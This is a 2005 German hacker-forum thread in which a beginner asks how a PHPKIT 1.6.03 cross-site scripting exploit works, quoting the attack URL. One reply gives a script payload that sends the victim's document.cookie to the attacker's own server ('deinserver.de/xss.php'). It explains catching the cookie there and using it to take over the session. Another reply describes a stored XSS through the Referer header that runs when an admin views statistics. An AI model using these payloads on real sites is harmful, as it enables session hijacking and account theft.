[HaBo]
| (In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene. |
Frage bzgl. PHPKIT Exploit
Diskussion: Frage bzgl. PHPKIT Exploit im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige HI ! Ich habe einen PHPKIT 1.6.03 Exploit rausgesucht und versuchte mich damit mal etwas auseinander zu setzen, wobei ...
 |
08.03.05, 21:10
| #1 (permalink) |
| Registriert seit: 08.03.05  Likes: 0 |  Frage bzgl. PHPKIT Exploit Anzeige HI ! Ich habe einen PHPKIT 1.6.03 Exploit rausgesucht und versuchte mich damit mal etwas auseinander zu setzen, wobei dann folgende Fragen aufgetaucht sind : 1) Wie würde man diesen Exploit anwenden ( stark theoretisch ) und was ist mit dem <script>....</script> gemeint ? Muss ich etwas selber scripten oder muss ich den so verwenden wie er geschrieben ist ??? Wenn ich den so anwende bekomme ich nur eine meldung als MD5-Hash oder so. http://www.example.com/phpkit/popup.php?img="><script>alert(document.cookie)</script> Ich beschäftige mich noch nicht lange mit dem Thema.....also wenn ich da irgendeinen Müll geschrieben habe....sry thnx4replies |
|  |
|
08.03.05, 21:26
| #2 (permalink) |
| Administrator   Registriert seit: 02.10.01  Likes: 30 |
__________________ RL sux big time... auch 2012! Deleting pr0n is like killing your best friend [HaBo] bei Facebook - Werde Fan |
|
| |
| HaBOT | - Anzeige - |
|
|
08.03.05, 21:52
| #3 (permalink) | ||
| Moderator  Registriert seit: 30.03.04 Likes: 14 | Hallo, Zitat:
Also falls du Exploits wirklich verstehen willst, dann solltest du natürlich zuerst PHP lernen, evt. noch die Grundlagen von HTML & JavaScript. Zitat:
Aber ohne Kenne, kommste nicht weit. | ||
|
| |
|
10.03.05, 15:53
| #4 (permalink) |
| Themenstarter Registriert seit: 08.03.05 Likes: 0 | thnx erstmal ! Eine frage habe ich noch : was kann man zwischen "<script>alert(document.cookie)</script>" schreiben ? da kann man doch verschiedene befehle eingeben oder ??? Aber alles nur in HTML ??? thnx |
|
| |
|
18.12.05, 21:24
| #5 (permalink) |
| Registriert seit: 17.12.05 Likes: 0 | brauchst nen webserver dafür. hier ein kleines beispiel: Code: <script>document.location=?http://deinserver.de/xss.php?cookie=?+document.cookie</script>  jetzt musste das cookie nur noch mit nem php script auf deinem server auffangen und dieses dann mit deinem ersetzen das wars. wenn du dafür noch nen kleinen denkanstoß brauchst, dann pn an mich nachtrag: hab gerade den link gesehen. sorry, aber da steht alles genau beschrieben  also vergiß meine antwort einfach hast sie ja schon gehabt |
|
| |
|
19.12.05, 15:09
| #6 (permalink) |
| Registriert seit: 23.05.05  Likes: 0 | Bissl alt das Topic,oder  Xalon P.S. ie beste Sicherheitslücke am PHPKIT find ich ist die XSS Lücke die man beim Referer angeben kann,wenn ein Admin sich dann die Statistiken anschaut wird der Code ausgeführt:Referer: <script>alert("HAcked ;-)")</script> |
|
| |
|
| - Anzeige - | |
|
|
[HaBo] » Security Area » (In)security allgemein » Frage bzgl. PHPKIT Exploit
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| PHPKit vs. Joomla | DerBastian | Webmaster-Security | 3 | 23.07.07 17:02 |
| newbie frage bzgl. programmiersprachen | Sic! | Code Kitchen | 17 | 31.01.07 18:10 |
| Phpkit Bug? | Plastikman | (Web-) Design und webbasierte Sprachen | 0 | 05.10.03 17:21 |
| Frage aus Interesse bzgl. ME-Bootfehler | non | Windows | 2 | 03.09.03 20:09 |
